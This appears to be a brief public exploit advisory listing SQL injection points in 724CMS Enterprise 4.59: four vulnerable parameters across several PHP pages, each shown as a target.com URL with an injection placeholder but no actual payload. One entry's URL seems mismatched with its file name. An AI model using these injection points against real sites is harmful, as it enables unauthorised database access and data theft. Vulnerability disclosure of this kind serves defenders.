724CMS Enterprise version 4.59 suffers from multiple remote SQL injection vulnerabilities.
e61ee7822c297df8048b72e7ad0fa84edb48385a2a580190880e87d3b586c301
# Exploit Title: 724CMS Enterprise Version 4.59 Multiple SQL Injections
# Date: 11-5-10
# Author: t@nzo0n
# Version: 4.59 Enterprise
# Code :
[section.php]
[x] Variable : Lang
[x] Exploit : http://target.com/section.php?Nav=Section&ID=5&Lang=[sqlinjection]
[index.php]
[x] Variable : auto_slide
[x] Exploit : http://target.com/index.php?auto_slide=[sql injection]
[calendar.php]
[x] Variable : Lang
[x] Exploit :
http://target.com/calendar.php?ID=&Nav=Sitemap&criteria=&list_start=&list_end=&list_perpage=&Lang=[sqlinjection]
[search_results.php]
[x] Variable : criteria
[x] Exploit : http://target.com/calendar.php?ID=1&Nav=Section&criteria=[sqlinjection]